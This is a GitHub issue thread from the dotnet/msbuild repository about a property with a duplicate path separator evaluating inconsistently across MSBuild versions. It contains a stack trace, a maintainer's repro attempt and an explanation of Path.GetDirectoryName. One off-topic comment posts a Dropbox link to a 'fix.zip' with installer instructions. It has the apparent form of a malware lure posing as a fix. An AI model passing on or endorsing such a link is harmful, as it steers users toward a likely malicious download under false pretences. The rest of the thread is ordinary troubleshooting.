### ISSUE TITLE
[Bug]: Inconsistent behavior of duplicate path separator in property

### ISSUE THREAD

**Issue by just-ero** [dotnet/msbuild#10565]
### Issue Description

In another project, I added the following properties at `<solution-dir>/props/MyProject.Paths.props` (for collecting common directories used throughout project files):
```xml
<PropertyGroup>
  <RootPath>$(MSBuildThisFileDirectory)\..</RootPath> <!-- Property in question. -->

  <ArtifactsPath>$(RootPath)\artifacts</ArtifactsPath>
</PropertyGroup>
```
I add the extra path separator in `RootPath` because I find separating `$(MSBuildThisFileDirectory)` and `..` more readable. This, of course, evaluates to `<MSBuildThisFileDirectory>\\..`, which works for me on the CLI and from Visual Studio, as well as in the project's CI.

However, the maintainer of the project had asked me to change this property to remove the extra path separator because the solution would not build otherwise:
```
System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Users\<user>\<solution-dir>\props\artifacts\obj\MyProject\debug\MyProject.exe.withSupportedRuntime.config'.
   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
   at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize)
   at System.Xml.XmlDownloadManager.GetStream(Uri uri, ICredentials credentials, IWebProxy proxy, RequestCachePolicy cachePolicy)
   at System.Xml.XmlUrlResolver.GetEntity(Uri absoluteUri, String role, Type ofObjectToReturn)
   at System.Xml.XmlTextReaderImpl.FinishInitUriString()
   at System.Xml.XmlReaderSettings.CreateReader(String inputUri, XmlParserContext inputContext)
   at System.Xml.Linq.XDocument.Load(String uri, LoadOptions options)
   at Microsoft.Build.Tasks.GenerateBindingRedirects.LoadAppConfig(ITaskItem appConfigItem)
   at Microsoft.Build.Tasks.GenerateBindingRedirects.Execute()
   at Microsoft.Build.BackEnd.TaskExecutionHost.Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()
   at Microsoft.Build.BackEnd.TaskBuilder.<ExecuteInstantiatedTask>d__26.MoveNext()	MyProject	C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\amd64\Microsoft.Common.CurrentVersion.targets	2509	
```

You can see here, that MSBuild generates an `artifacts` directory inside of the `props` directory. I have to assume this is because `$(RootPath)` evaluates to an empty string, leaving only `\artifacts` as the `ArtifactsPath` property.

### Steps to Reproduce

As this does work for both me and the CI, I wouldn't know how to reproduce this.

### Expected Behavior

The evaluation of the properties is consistent across machines.

### Actual Behavior

It is not.

Perhaps interesting, the below does not work either, not for me, nor for the maintainer:
```xml
<RootPath>$([System.IO.Path]::GetDirectoryName($(MSBuildThisFileDirectory)))</RootPath>
```

Despite the same being used in other `dotnet`-adjacent repositories: https://github.com/dotnet/java-interop/blob/fcad3368815dffd0f38f64384aa21b0b65367d68/Directory.Build.props#L20-L23.

### Versions & Configurations

Working:
```
msbuild --version:  MSBuild version 17.11.2+c078802d4 for .NET Framework
                    17.11.2.32701
dotnet --list-sdks: 9.0.100-preview.7.24407.12
```
Not working:
```
msbuild --version:  MSBuild version 17.9.8+b34f75857 for .NET Framework
                    17.9.8.16306
dotnet --list-sdks: 8.0.202
```

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GangWang01** [comment]
@just-ero I followed your description and created a sample solution trying to reproduce the issue. Unfortunately, I couldn't reproduce it using dotnet 8.0.202 or msbuild.exe 17.9.8, neither the static property function problem `<RootPath>$([System.IO.Path]::GetDirectoryName($(MSBuildThisFileDirectory)))</RootPath>`. 
[SampleProjectAndBinaryLog.zip](https://github.com/user-attachments/files/16990998/SampleProjectAndBinaryLog.zip) has the sample solution and build binary log with the name indicating it's built with dotnet cli or msbuild.exe.

Can you provide a sample solution and steps to reproduce if you could reproduce, as well as [build binary log](https://github.com/dotnet/msbuild/blob/main/documentation/wiki/Providing-Binary-Logs.md) for the investigation? Be aware that binary log might capture sensitive info and be careful before sharing.

**Comment by just-ero** [comment]
Hi, thanks for getting back on this.  
`<RootPath>$([System.IO.Path]::GetDirectoryName($(MSBuildThisFileDirectory)))</RootPath>` still fails for me, placing the artifacts in `props/artifacts`.

I've created a sample solution at [`just-ero/ParentDirectoryRepro`](https://github.com/just-ero/ParentDirectoryRepro). It includes a binlog in the root of the repository.

**Comment by just-ero** [comment]
I see now that I must not have been clear in my original issue when it comes to `GetDirectoryName`. I thought that method would return the path of the directory above. A simple console app with this code made me believe that:
```cs
Console.WriteLine(Path.GetDirectoryName("C:\Some\Path"));
```
```
C:\Some
```

**Comment by GangWang01** [comment]
@just-ero 
The method `System.IO.Path.GetDirectoryName` returns different the directories for the pathes below referring to [Example](https://learn.microsoft.com/en-us/dotnet/api/system.io.path.getdirectoryname?view=net-8.0#definition:~:text=GetDirectoryName(%27C%3A%5CMyDir%5C%27)%20returns%20%27C%3A%5CMyDir%27%0AGetDirectoryName(%27C%3A%5CMyDir%27)%20returns%20%27C%3A%5C%27) though they looks similar.
- `C:\Some\Path` -> `C:\Some`
- `C:\Some\Path\` -> `C:\Some\Path`

MSBuild property [MSBuildThisFileDirectory](https://learn.microsoft.com/en-us/visualstudio/msbuild/msbuild-reserved-and-well-known-properties?view=vs-2022#:~:text=MSBuildThisFileDirectory) includes the final backslash in the path. It's the reason that `<RootPath>$([System.IO.Path]::GetDirectoryName($(MSBuildThisFileDirectory)))</RootPath>` is still the directory of the props file `ParentDirectoryRepro.Paths.props`, rather than its parent directory.

**Comment by just-ero** [comment]
I see.  
The maintainer for whom it didn't work unfortunately already updated their Visual Studio version and the extra path separator (`$(MSBuildThisFileDirectory)\..`) now works. Unfortunately that means I don't have any binlogs.  
Feel free to close.
